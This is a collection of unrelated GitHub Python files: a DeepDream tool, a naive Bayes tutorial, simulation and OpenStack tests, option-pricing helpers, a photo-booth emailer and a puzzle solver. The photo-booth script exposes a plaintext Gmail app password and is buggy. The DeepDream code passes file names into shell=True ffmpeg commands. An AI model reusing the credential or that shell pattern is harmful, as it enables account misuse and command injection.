detail.shape[-2:]\n detail = zoom(detail, (1, 1.0*h/h1, 1.0*w/w1), order=1)\n\n src.reshape(1, 3, h, w) # resize the network's input image size\n src.data[0] = octave_base+detail\n\n for i in range(iter_n):\n _make_step(net, end=end, clip=clip, **step_params)\n\n # visualization\n vis = _deprocess(net, src.data[0])\n if not clip: # adjust image contrast if clipping is disabled\n vis = vis*(255.0/np.percentile(vis, 99.98))\n\n # extract details produced on the current octave\n detail = src.data[0]-octave_base\n\n # returning the resulting image\n return _deprocess(net, src.data[0])\n\n\ndef _output_video_dir(video):\n return \"{}_images\".format(video)\n\n\ndef _extract_video(video):\n output_dir = _output_video_dir(video)\n mkdir(output_dir)\n output = Popen(\n \"ffmpeg -loglevel quiet -i {} -f image2 {}/img_%4d.jpg\".format(\n video, output_dir), shell=True, stdout=PIPE).stdout.read()\n\n\ndef _create_video(video, frame_rate=24):\n output_dir = _output_video_dir(video)\n output = Popen((\n \"ffmpeg -loglevel quiet -r {} -f image2 -pattern_type glob \"\n \"-i \\\"{}/img_*.jpg\\\" {}.mp4\").format(\n frame_rate, output_dir, video),\n shell=True, stdout=PIPE).stdout.read()\n\n\ndef list_layers(network=\"bvlc_googlenet\"):\n # Load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n net.blobs.keys()\n\n\ndef deepdream(\n img_path, zoom=True, scale_coefficient=0.05, irange=100, iter_n=10,\n octave_n=4, octave_scale=1.4, end=\"inception_4c/output\", clip=True,\n network=\"bvlc_googlenet\", gif=False, reverse=False, duration=0.1,\n loop=False, gpu=False, gpuid=0):\n img = np.float32(img_open(img_path))\n s = scale_coefficient\n h, w = img.shape[:2]\n\n if gpu:\n print(\"Enabling GPU {}...\".format(gpuid))\n set_device(gpuid)\n set_mode_gpu()\n\n # Select, load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n\n img_pool = [img_path]\n\n # Save settings used in a log file\n logging.info((\n \"{} zoom={}, scale_coefficient={}, irange={}, iter_n={}, \"\n \"octave_n={}, octave_scale={}, end={}, clip={}, network={}, gif={}, \"\n \"reverse={}, duration={}, loop={}\").format(\n img_path, zoom, scale_coefficient, irange, iter_n, octave_n,\n octave_scale, end, clip, network, gif, reverse, duration, loop))\n\n print(\"Dreaming...\")\n for i in range(irange):\n img = _deepdream(\n net, img, iter_n=iter_n, octave_n=octave_n,\n octave_scale=octave_scale, end=end, clip=clip)\n img_fromarray(np.uint8(img)).save(\"{}_{}.jpg\".format(\n img_path, i))\n if gif:\n img_pool.append(\"{}_{}.jpg\".format(img_path, i))\n print(\"Dream {} saved.\".format(i))\n if zoom:\n img = affine_transform(\n img, [1-s, 1-s, 1], [h*s/2, w*s/2, 0], order=1)\n if gif:\n print(\"Creating gif...\")\n frames = None\n if reverse:\n frames = [img_open(f) for f in img_pool[::-1]]\n else:\n frames = [img_open(f) for f in img_pool]\n writeGif(\n \"{}.gif\".format(img_path), frames, duration=duration,\n repeat=loop)\n print(\"gif created.\")\n\n\ndef deepdream_video(\n video, iter_n=10, octave_n=4, octave_scale=1.4,\n end=\"inception_4c/output\", clip=True, network=\"bvlc_googlenet\",\n frame_rate=24):\n\n # Select, load DNN model\n NET_FN, PARAM_FN, CHANNEL_SWAP, CAFFE_MEAN = _select_network(network)\n net = Classifier(\n NET_FN, PARAM_FN, mean=CAFFE_MEAN, channel_swap=CHANNEL_SWAP)\n\n print(\"Extracting video...\")\n _extract_video(video)\n\n output_dir = _output_video_dir(video)\n images = listdir(output_dir)\n\n print(\"Dreaming...\")\n for image in images:\n image = \"{}/{}\".format(output_dir, image)\n img = np.float32(img_open(image))\n img = _deepdream(\n net, img, iter_n=iter_n, octave_n=octave_n,\n octave_scale=octave_scale, end=end, clip=clip)\n img_fromarray(np.uint8(img)).save(image)\n\n print(\"Creating dream video...\")\n _create_video(video, frame_rate)\n print(\"Dream video created.\")\n","repo_name":"kesara/deepdreamer","sub_path":"deepdreamer/deepdreamer.py","file_name":"deepdreamer.py","file_ext":"py","file_size_in_byte":7851,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"61"}
+{"seq_id":"6500889686","text":"# 贝氏分类器\n# 是一种非常快速且简单的分类算法, 经常适用于非常高维度的资料\n# 因为此算法非常快而且可调的参数非常少, 常被拿来当作针对某一分类问题应急用的基线时非常实用\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\n\nclass BayesianClassification():\n def introduce(self):\n '''Naive Bayes分类器建立在 Bayesian分类法之上.\\n\\\n 它所依赖的Bayes定理, 是用来描述统计量条件几率关系的等式. \\n\\\n 若已经给了一些观察过的特征标签之几率写成 P(L|features), 贝氏定理可以使用可计算的量来表达. \\n\\\n \\tP(L|features) = P(feature|L) * P(L) / P(features)\\n\\\n # supplement: P(L|features) = P(L∩features)/P(features) ∩表示交集.\\n\\\n 若我们尝试在2个标签之间做决定, 假设2个标签分别为L1, L2, \\n\\\n \\tP(L1|features) / P(L2|features) = P(features|L1) * P(L1) / P(features|L2) * P(L2)\\n\\\n 现在我们需要的就是可以对每一个标签计算 P(features|L1)的模型, 此模型称为生成模型(generative model),\\n\\\n 因为它指定了产生这些资料的假定随机程序;对于每个标签指定一个生成模型是贝氏分类器的主要部分.\\n\\\n 贝氏分类器的不同型态依赖在关于资料不同的单纯假设, 以下会有一些例子.\\n\n '''\n \n def GaussianNaiveBayes(self):\n '''此分类器是假设每一个标签的资料都是来自于一个简单的高斯分布(simple Gaussian distribution)'''\n # 假如有以下的资料\n from sklearn.datasets import make_blobs\n x, y = make_blobs(100, 2, centers = 2, random_state = 2, cluster_std = 1.5)\n plt.scatter(x[:, 0], x[:, 1], c = y, s = 50, cmap = 'RdBu')\n # plt.show()\n\n # 建立一个简单的模型, 并预测其标签\n explanation = \"在此分类中可以稍微看到一个弯曲的边界. 一般而言, 高斯朴素贝氏的边界都是二次方程式\"\n from sklearn.naive_bayes import GaussianNB\n model = GaussianNB()\n model.fit(x, y)\n rng = np.random.RandomState(0)\n xnew = [-6, -14] + [14, 18] * rng.rand(2000, 2)\n ynew = model.predict(xnew)\n # plt.scatter(x[:, 0], x[:, 1], c = y, s = 50, cmap = 'RdBu')\n lim = plt.axis()\n plt.scatter(xnew[:, 0], xnew[:, 1], c = ynew, s = 20, cmap = 'BrBG', alpha = 0.1)\n plt.axis(lim)\n # print(explanation)\n # plt.show()\n\n # 贝氏定理其中一个不错的点是, 在本质上允许几率分类, 使得可以利用predict_proda方法来进行计算\n yprod = model.predict_proba(xnew)\n print(yprod[-8:].round(2))\n # [[0.89 0.11]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [1. 0. ]\n # [0. 1. ]\n # [0.15 0.85]]\n\n # 上面这些栏的内容列出了第一个和第二个的后验几率. 如果在寻找分类中对于不确定性的评估, \n # 像这样的贝氏方式是很有用的方法.\n # 但是, 最终分类将只会和模型假设所推导的一样好, 这也是为什么高斯朴素贝氏经常没有办法产生非常好的结果\n # 然而, 在许多的情况中, 这个假设不至于让高斯朴素贝氏不能成为一个好用的方法\n\n def MultinomialNaiveBayes(self, s = None):\n '''多项式朴素贝氏, 它的特征被假设是从一个简单的多项式分布产生而来的\\n\\\n 多项式分布描述在一个数量的类别中观察到的次数之频率, 而使得此种多项式朴素贝式非常适合于其特征是\\n\\\n 代表次数或计次比率的地方.\\n\\\n 这个概念和上一个一样, 原本资料分布是使用最适高斯, 而改为使用最适多项式分布来取代资料分布.'''\n\n # Example: 文字的分类\n # 多项式朴素贝氏经常会被用到的地方是文字的分类工作, 其中特征是和要被分类的文件中文字出现的次数或频率相关的\n # 在此将从20个新闻群组语料库中使用稀疏文字计数特征, 以展示可以如何把这些简短的文件分类\n\n from sklearn.datasets import fetch_20newsgroups\n data = fetch_20newsgroups()\n # print(data.target_names)\n \n # 为了简单起见, 选用少部分的类别, 接着下载训练和测试资料集\n categories = ['talk.religion.misc', 'soc.religion.christian', 'sci.space', 'comp.graphics']\n train = fetch_20newsgroups(subset = 'train', categories = categories)\n test = fetch_20newsgroups(subset = 'test', categories = categories)\n \n # 以下是从资料中所得到的其中一个项目的代表性内容\n # print(train.data[5])\n\n # 为了使用这些资料进行机器学习, 首先要把每个字串的内容转换成数值向量, 使用TF-IDF\n from sklearn.feature_extraction.text import TfidfVectorizer\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.pipeline import make_pipeline\n\n model = make_pipeline(TfidfVectorizer(), MultinomialNB())\n model.fit(train.data, train.target)\n labels = model.predict(test.data)\n\n # 使用测试资料完成预测标签后, 使用混淆矩阵来验证, 显示真实结果与预测之间以了解评估器的效能\n from sklearn.metrics import confusion_matrix\n mat = confusion_matrix(test.target, labels)\n sns.heatmap(mat.T, square = True, annot = True, fmt = 'd', cbar = False, \n xticklabels = train.target_names, yticklabels = train.target_names)\n plt.xlabel('true label')\n plt.ylabel('predicted label')\n # plt.show()\n\n # 现在有一个工具可以判断任意字串的类别, 使用在这个管线中的predict()方法\n if s != \"None\":\n pred = model.predict([s])\n return train.target_names[pred[0]]\n\n\n def summary(self):\n '''贝氏分类器优点: 不管训练or预测都非常快速; 提供了直接的几率预测; 易于解读; 可调变参数少\\n\\\n 但是一般而言它在更复杂的模型上并不一定执行一样好.\\n\\\n 通常在以下情况时会表现得特别好: 当朴素(naive)的假设正好符合资料时; 区分非常好的类别来说\\n\\\n , 模型的复杂度显得不是这么重要; 对于非常高维度的资料, 模型复杂度也比较不重要.'''\n\nNBC = BayesianClassification()\nhelp(NBC.introduce)\n# NBC.GaussianNaiveBayes() # 用 help 可以查看函数的解说\n# NBC.MultinomialNaiveBayes() # 用 help 可以查看函数的解说\n\ns = 'sending a payload to the ISS'\n# print(NBC.MultinomialNaiveBayes(s)) # sci.space\n# help(NBC.MultinomialNaiveBayes)\n# help(NBC.summary)","repo_name":"Sapphire0912/Programming","sub_path":"Python/Practice/MachineLearning/Data Science/ML_NaiveBayes_Classification.py","file_name":"ML_NaiveBayes_Classification.py","file_ext":"py","file_size_in_byte":6943,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5580689107","text":"# -*- coding: utf-8 -*-\nfrom os import path\nfrom unittest import TestCase\nfrom unittest.mock import patch, Mock\nfrom tempfile import TemporaryDirectory\n\nimport ray\nimport numpy as np\n\nfrom hermespy.simulation import Simulation\nfrom hermespy.fec import LDPCCoding\nfrom hermespy.modem import DuplexModem, RootRaisedCosineWaveform\nfrom hermespy.tools import db2lin\n\n__author__ = \"Jan Adler\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass TestMonteCarloFEC(TestCase):\n \n def setUp(self) -> None:\n \n self.simulation = Simulation()\n self.simulation.new_dimension('snr', [db2lin(x) for x in np.arange(-10, 10, .5)])\n self.simulation.num_samples = 2\n device = self.simulation.scenario.new_device()\n self.modem = DuplexModem()\n self.modem.device = device\n self.modem.waveform_generator = RootRaisedCosineWaveform(oversampling_factor=1, symbol_rate=100e6, num_data_symbols=200, modulation_order=64, num_preamble_symbols=0)\n \n @classmethod\n def setUpClass(cls) -> None:\n\n ray.init(local_mode=True, num_cpus=2, ignore_reinit_error=True)\n \n @classmethod\n def tearDownClass(cls) -> None:\n\n # Shut down ray \n ray.shutdown()\n \n def __run_simulation(self) -> None:\n \"\"\"Run a simulation and test for proper execution.\"\"\"\n\n with patch('sys.stdout'), patch('matplotlib.pyplot.figure'):\n \n self.simulation.run()\n \n def _test_ldpc(self) -> None:\n \n ldpc_matrix = path.join(path.dirname(path.realpath(__file__)), '..', '..', 'submodules', 'affect', 'conf', 'dec', 'LDPC', 'CCSDS_64_128.alist')\n \n with TemporaryDirectory() as g_dir:\n \n g_path = path.join(g_dir, 'g_save.alist')\n coding = LDPCCoding(100, ldpc_matrix, \"\", False, 10)\n self.modem.encoder_manager.add_encoder(coding)\n \n self.__run_simulation()\n","repo_name":"Barkhausen-Institut/hermespy","sub_path":"tests/integration_tests/test_fec_ray.py","file_name":"test_fec_ray.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"61"}
+{"seq_id":"19760260077","text":"from contextlib import contextmanager\nimport copy\nimport os\n\nfrom yakumo import Client\nfrom yakumo.smoketest import *\nfrom yakumo import utils\n\nfrom yakumo.smoketests import *\n\n\nCIDR1 = os.environ.get('CIDR1', '192.168.35.0/24')\nCIDR2 = os.environ.get('CIDR2', '192.168.36.0/24')\nGATEWAY_IP1 = os.environ.get('GATEWAY_IP1', '192.168.35.254')\nGATEWAY_IP2 = os.environ.get('GATEWAY_IP2', '192.168.36.254')\n\nIMAGE = os.environ.get('IMAGE', 'images/cirros-0.3.5-x86_64-disk.img')\nCONTAINER_FORMAT = os.environ.get('CONTAINER_FORMAT', 'bare')\nDISK_FORMAT = os.environ.get('DISK_FORMAT', 'qcow2')\nFLAVOR = os.environ.get('FLAVOR', 'm1.tiny')\nAZ = os.environ.get('AZ', 'nova')\nROLE = os.environ.get('ROLE', '_member_')\n\n\ndef run_tenant_tests(c, c2):\n\n for t in SWIFT_TESTS + GLANCE_TESTS + NEUTRON_TESTS + CINDER_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n if t.__name__.endswith('admin'):\n t.main(c)\n else:\n t.main(c2)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\", t.__doc__, e)\n\n with c2.network.create(name=get_random_str('network'),\n is_shared=False) as n1, \\\n c2.network.create(name=get_random_str('network'),\n is_shared=False) as n2:\n\n with c2.subnet.create(name=get_random_str('subnet'),\n network=n1,\n ip_version=4,\n cidr=CIDR1,\n gateway_ip=GATEWAY_IP1,\n is_dhcp_enabled=True) as sn1, \\\n c2.subnet.create(name=get_random_str('subnet'),\n network=n2,\n ip_version=4,\n cidr=CIDR2,\n gateway_ip=GATEWAY_IP2,\n is_dhcp_enabled=True) as sn2:\n\n with c2.router.create(name=get_random_str('router')) as r1, \\\n c2.router.create(name=get_random_str('router')) as r2, \\\n c2.key_pair.create(name=get_random_str('keypair')) as k, \\\n c2.image.create(name=get_random_str('image'),\n file=IMAGE,\n container_format=CONTAINER_FORMAT,\n disk_format=DISK_FORMAT) as i:\n\n r1.add_interface(subnet=sn1)\n r2.add_interface(subnet=sn2)\n\n f = c2.flavor.find_one(name=FLAVOR)\n az = c2.availability_zone.get_empty(AZ)\n\n for t in NOVA_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n if t.__name__.endswith('admin'):\n t.main(\n c, image=i, flavor=f, key_pair=k,\n network=n1, network2=n2,\n availability_zone=az)\n else:\n t.main(\n c2, image=i, flavor=f, key_pair=k,\n network=n1, network2=n2,\n availability_zone=az)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\",\n t.__doc__, e)\n\n r1.remove_interface(subnet=sn1)\n r2.remove_interface(subnet=sn2)\n\n test(\"Router #1 is deleted\", r1 not in c2.router.list())\n test(\"Router #2 is deleted\", r2 not in c2.router.list())\n test(\"Key Pair #1 is deleted\", k not in c2.key_pair.list())\n test(\"Image #1 is deleted\", i not in c2.image.list())\n\n test(\"Subnet #1 is deleted\", sn1 not in c2.subnet.list())\n test(\"Subnet #2 is deleted\", sn2 not in c2.subnet.list())\n\n test(\"Network #1 is deleted\", n1 not in c2.network.list())\n test(\"Network #2 is deleted\", n2 not in c2.network.list())\n\n\ndef run_tests(c):\n\n for t in KEYSTONE_TESTS:\n try:\n LOG.info(\"%s: Started\", t.__doc__)\n t.main(c)\n LOG.info(\"%s: Finished successfully\", t.__doc__)\n except Exception as e:\n LOG.exception(\"%s: Error occured: %s\", t.__doc__, e)\n\n project_name = get_random_str('test')\n user_name = get_random_str('test')\n password = get_random_str('pass')\n\n config = copy.copy(c._session.config)\n config['auth']['project_name'] = project_name\n config['auth']['username'] = user_name\n config['auth']['password'] = password\n r = c.role.find_one(name=ROLE)\n\n if config['identity_api_version'] == '2.0':\n with c.project.create(name=project_name,\n description='test project',\n is_enabled=True) as p:\n with c.user.create(name=user_name,\n username='test user',\n password=password,\n project=p,\n is_enabled=True) as u:\n p.grant_roles(users=u, roles=r)\n c2 = Client(**config)\n run_tenant_tests(c, c2)\n\n test(\"User #1 is deleted\", u not in c.user.list())\n test(\"Project #1 is deleted\", p not in c.project.list())\n\n elif config['identity_api_version'] == '3':\n d = c.domain.find_one(name=config['auth']['project_domain_name'])\n with c.project.create(name=project_name,\n description='test project',\n domain=d,\n is_enabled=True) as p:\n with c.user.create(name=user_name,\n password=password,\n domain=d,\n is_enabled=True) as u:\n p.grant_roles(users=u, roles=r)\n c2 = Client(**config)\n run_tenant_tests(c, c2)\n\n test(\"User #1 is deleted\", u not in c.user.list())\n test(\"Project #1 is deleted\", p not in c.project.list())\n\n\ndef main():\n c = utils.get_client()\n\n LOG.debug(\"list networks: %s\", [_.name for _ in c.network.list()])\n LOG.debug(\"list subnets: %s\", [_.name for _ in c.subnet.list()])\n LOG.debug(\"list routers: %s\", [_.name for _ in c.router.list()])\n LOG.debug(\"list servers: %s\", [_.name for _ in c.server.list()])\n LOG.debug(\"list key pairs: %s\", [_.name for _ in c.key_pair.list()])\n LOG.debug(\"list images: %s\", [_.name for _ in c.image.list()])\n run_tests(c)\n LOG.debug(\"list networks: %s\", [_.name for _ in c.network.list()])\n LOG.debug(\"list subnets: %s\", [_.name for _ in c.subnet.list()])\n LOG.debug(\"list routers: %s\", [_.name for _ in c.router.list()])\n LOG.debug(\"list servers: %s\", [_.name for _ in c.server.list()])\n LOG.debug(\"list key pairs: %s\", [_.name for _ in c.key_pair.list()])\n LOG.debug(\"list images: %s\", [_.name for _ in c.image.list()])\n show_test_summary()\n\nif __name__ == '__main__':\n main()\n","repo_name":"iliiilililii/python-yakumo","sub_path":"yakumo/cmd/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":7285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"30919959048","text":"import numpy as np\nfrom scipy.interpolate import InterpolatedUnivariateSpline\nfrom scipy.stats import norm\nfrom scipy.optimize import newton\n\n#CALL\ndef bs_explicit_call(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate - dividends + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n d2 = d1 - SIGMA * np.sqrt(ttm)\n return np.exp(-dividends * ttm) * norm.cdf(d1) * spot - norm.cdf(d2) * strike * np.exp(-rate * ttm)\n\n\ndef bs_call_delta(ttm, strike, spot, rate, SIGMA, dividends=0):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return np.exp(-dividends * ttm) * norm.cdf(d1)\n\n\ndef bs_put_delta(ttm, strike, spot, rate, SIGMA, dividends=0):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return -np.exp(-dividends * ttm) * norm.cdf(-d1)\n\n\n#PUT\ndef bs_explicit_put(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate - dividends + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n d2 = d1 - SIGMA * np.sqrt(ttm)\n return norm.cdf(-d2) * strike * np.exp(-rate * ttm) - np.exp(-dividends * ttm) * norm.cdf(-d1) * spot\n\n\n\ndef bs_vega(ttm, strike, spot, rate, SIGMA, dividends=0.):\n d1 = (np.log(spot / strike) + (rate + SIGMA ** 2 / 2) * ttm) / SIGMA / np.sqrt(ttm)\n return spot * np.exp(-dividends * ttm) * norm.pdf(d1) * np.sqrt(ttm)\n\n\n\n\ndef bs_gamma(ttm, strike, spot, rate, SIGMA, dividends=0):\n assert dividends == 0, \"please implement dividends\"\n d1 = (np.log(spot / strike) + (rate + 0.5 * SIGMA ** 2) * ttm) / (SIGMA * np.sqrt(ttm))\n return norm.pdf(d1) / (spot * SIGMA * np.sqrt(ttm))\n\n\ndef bs_iv(ttm, strike, spot, rate, price, otype='C', dividends=0., x0=0.7):\n\n assert otype.upper() in ('C', 'P'), \"Option type must be 'C' or 'P'\"\n\n def target(sigma):\n return otype.upper() == 'C' \\\n and bs_explicit_call(ttm, strike, spot, rate, sigma, dividends) - price \\\n or bs_explicit_put(ttm, strike, spot, rate, sigma, dividends) - price\n\n try:\n return newton(target, x0=x0)\n except RuntimeError as e:\n return np.nan\n\n\ndef sizeof_fmt(num, suffix='B'):\n\n for unit in ['', 'Ki', 'Mi', 'Gi', 'Ti', 'Pi', 'Ei', 'Zi']:\n if abs(num) < 1024.0:\n return \"%3.1f%s%s\" % (num, unit, suffix)\n num /= 1024.0\n\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\n\n\n# interpolation options functions\ndef interpolate(fn, model, period, asset):\n\n # interpolation parameters\n n = 200\n a1, a2 = -0.9, 5.\n\n output = np.empty(asset.underlying.paths.shape)\n output[:] = np.nan\n\n for idx, day in enumerate(period.date_range):\n\n dt = asset.maturity - day\n ttm = dt.days / 365\n if ttm <= 0:\n break\n\n x0 = model.parameters(day).to_numpy()\n xs = asset.strike * (1 + np.linspace(a1, a2, n))\n ys = fn(x0, ttm, asset.strike, xs, asset.underlying.rate)\n\n interp = InterpolatedUnivariateSpline(xs, ys, k=1)\n output[:, idx] = interp(asset.underlying.paths[:, idx])\n\n return output\n","repo_name":"YELORFI/Pricing-crypto","sub_path":"Local_lib/useful.py","file_name":"useful.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28649375777","text":"import cv2\r\nfrom PIL import Image, ImageDraw\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email import encoders\r\n\r\n# Initialize the camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Capture a frame\r\nret, frame = cap.read()\r\n\r\n# Release the camera\r\ncap.release()\r\n\r\n# Open the captured image\r\nimage = Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\r\n\r\n# Load the emoji image\r\nemoji = Image.open('../static/images/lumo.png')\r\n\r\n# Resize the emoji to fit your desired size\r\nemoji = emoji.resize((150, 150))\r\n\r\n# Calculate the position for the left bottom corner\r\nx_position = 20 # Adjust this value for the desired horizontal position\r\ny_position = image.height - emoji.height - 20 # 20 pixels from the bottom, adjust as needed\r\n\r\n# Paste the emoji onto the captured image\r\nimage.paste(emoji, (x_position, y_position), emoji)\r\n\r\n# Save the modified image\r\noutput_image_path = \"../static/images/output_image.png\"\r\nimage.save(output_image_path)\r\n\r\n# Send the modified image via email\r\nfrom_email = \"vemulashivani2012@gmail.com\"\r\nfrom_password = \"qlww rkwk waze aycs\"\r\n# user_mail=input(\"Enter your mail id\") get user name from request parameters\r\nto_email = \"\"\r\n\r\n# Create a MIME object\r\nmsg = MIMEMultipart()\r\nmsg['From'] = from_email\r\nmsg['To'] = to_email\r\nmsg['Subject'] = \"Image with LUMOS LOGO\"\r\n\r\n# Attach the modified image\r\nwith open(output_image_path, 'rb') as attachment:\r\n part = MIMEBase('application', 'octet-stream')\r\n part.set_payload(attachment.read())\r\n encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', f\"attachment; filename= {output_image_path}\")\r\n msg.attach(part)\r\n\r\n# Connect to Gmail's SMTP server and send the email\r\ntry:\r\n # Connect to Gmail's SMTP server and send the email\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.starttls()\r\n server.login(from_email, from_password)\r\n server.sendmail(from_email, user_mail, msg.as_string())\r\n server.quit()\r\n print(\"Email sent successfully to:\", user_mail)\r\nexcept Exception as e:\r\n print(\"Email could not be sent:\", str(e))","repo_name":"maxnsi/hsbc-bot","sub_path":"HSBC_Bot/HSBC_Bot_Server/photo_booth.py","file_name":"photo_booth.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7458556459","text":"from itertools import combinations\nfrom functools import reduce\nimport regex as re\n\ndef read_file(file):\n with open(file) as f:\n tiles = f.read().split(\"\\n\\n\")\n tiles = [tile.splitlines() for tile in tiles if tile != '']\n tile_ids = [tile[0][tile[0].index(\" \") + 1:tile[0].index(\":\")] for tile in tiles]\n tile_imgs = [tile[1:] for tile in tiles]\n \n return dict(zip(tile_ids, tile_imgs))\n\n# t, b, l, r, tr, br, lr, rr\ndef get_border(tile_img):\n border = []\n border = border + [tile_img[0]] + [tile_img[-1]]\n tile_flip = list(zip(*tile_img))\n border = border + [\"\".join(tile_flip[0])] + [\"\".join(tile_flip[-1])]\n \n border += [\"\".join(reversed(b)) for b in border]\n \n return border\n \n\n\ntiles = read_file(\"input/20_input.txt\")\n\ntile_borders = {}\nfor k, v in tiles.items():\n tile_borders[k] = get_border(v)\n\n\ndef get_share_borders(tiles, tile_borders):\n new_tiles = tiles.copy()\n id_combs = combinations(new_tiles.keys(), 2)\n share_edges = {}\n for comb in id_combs:\n share_edges[comb] = set(tile_borders[comb[0]]).intersection(set(tile_borders[comb[1]]))\n share_edges = {k: v for k, v in share_edges.items() if v} \n ids = [id for k in share_edges.keys() for id in k]\n share_count = {x:ids.count(x) for x in set(ids)}\n \n # corners have two adjacents\n corner = {k: v for k, v in share_count.items() if v == 2}\n \n return share_edges, corner\n\ndef part1():\n _, corner = get_share_borders(tiles, tile_borders)\n c = 1\n for k in corner.keys():\n c = c * int(k)\n \n return c\n\n# 18482479935793\npart1()\n\n\n## part 2\n\n# rotate or flip the tile\ndef transformers(tile):\n trans = [list(tile), list(tile[::-1])]\n trans = trans + [[line[::-1] for line in tran] for tran in trans]\n trans = trans + [[\"\".join(line) for line in zip(*tran)] for tran in trans]\n \n return trans\n \n\ndef get_adj_id(tile_id, share_edges):\n adj_ids = [i for k, v in share_edges.items() if tile_id in k for i in k if i != tile_id]\n return adj_ids\n \ndef init_tiles(left = '3229', tiles = tiles):\n new_tiles = []\n remain_tiles = tiles.copy()\n init_trans = transformers(tiles[left])\n break_flag = False\n adj_ids = get_adj_id(left, share_edges)\n \n for l_tran in init_trans:\n right_border = get_border(l_tran)[3]\n for adj in adj_ids:\n right_trans = transformers(tiles[adj])\n for r_tran in right_trans:\n left_border = get_border(r_tran)[2]\n if left_border == right_border:\n new_tiles.append((left, l_tran))\n new_tiles.append((adj, r_tran))\n remain_tiles.pop(left)\n remain_tiles.pop(adj)\n right_adj = adj\n break_flag = True\n break\n if break_flag:\n break\n if break_flag:\n break\n \n \n # the direction of the other adj\n other_adj = list(set(adj_ids).difference(set(right_adj)))[0]\n borders = get_border([t[1] for t in new_tiles if t[0] == left][0])\n \n # if top border in the adj, the direction is up, which means new_tiles is \n # the last row tiles\n top_bd = borders[0]\n if top_bd in get_border(tiles[other_adj]):\n direction = \"up\"\n \n return new_tiles, direction, remain_tiles\n \n\ndef get_row_tiles(curr_tiles, tiles, n_row = 12, share_edges = share_edges):\n row_tiles = curr_tiles.copy()\n remain_tiles = tiles.copy()\n # n_row = int(len(tiles) ** 0.5)\n \n while len(row_tiles) < n_row:\n curr_tile = row_tiles[-1]\n right_border = get_border(curr_tile[1])[3]\n adj_ids = get_adj_id(curr_tile[0], share_edges)\n # remove the tiles have been positioned\n adj_ids = [i for i in adj_ids if i in remain_tiles.keys()]\n \n break_flag = False\n for adj in adj_ids:\n right_trans = transformers(remain_tiles[adj])\n for r_tran in right_trans:\n left_border = get_border(r_tran)[2]\n if left_border == right_border:\n row_tiles.append((adj, r_tran))\n remain_tiles.pop(adj)\n break_flag = True\n break\n if break_flag:\n break\n \n return row_tiles, remain_tiles\n \n\ndef get_next_row_tiles(row_tiles, direction, tiles, share_edges):\n remain_tiles = tiles.copy()\n # row_ids = [term[0] for term in row_tiles]\n # remain_tiles = {k: v for k, v in remain_tiles.items() if k not in row_ids}\n \n curr_row_tiles = row_tiles.copy()\n next_row_tiles = []\n \n for tile in curr_row_tiles:\n adj_ids = get_adj_id(tile[0], share_edges)\n \n # should be length one \n adj_id = [i for i in adj_ids if i in remain_tiles.keys()]\n if len(adj_id) == 1:\n AssertionError(\"adj_id must be length one\")\n next_tile = tiles[adj_id[0]]\n \n curr_borders = get_border(tile[1])\n if direction == \"up\":\n bd = curr_borders[0]\n elif direction == \"down\":\n bd = curr_borders[1]\n else:\n AssertionError(\"direction must be up or down\")\n \n next_tile_trans = transformers(next_tile)\n \n for t in next_tile_trans:\n next_bds = get_border(t)\n if direction == \"up\":\n next_bd = next_bds[1]\n else:\n next_bd = next_bds[0]\n if next_bd == bd:\n next_row_tiles.append((adj_id[0], t))\n remain_tiles.pop(adj_id[0])\n break\n \n \n return next_row_tiles, remain_tiles\n \n\ndef get_all_tiles(curr_row_tiles, tiles, share_edges, direction = \"up\", n_col = 12):\n all_tiles = [curr_row_tiles]\n remain_tiles = tiles.copy()\n \n while 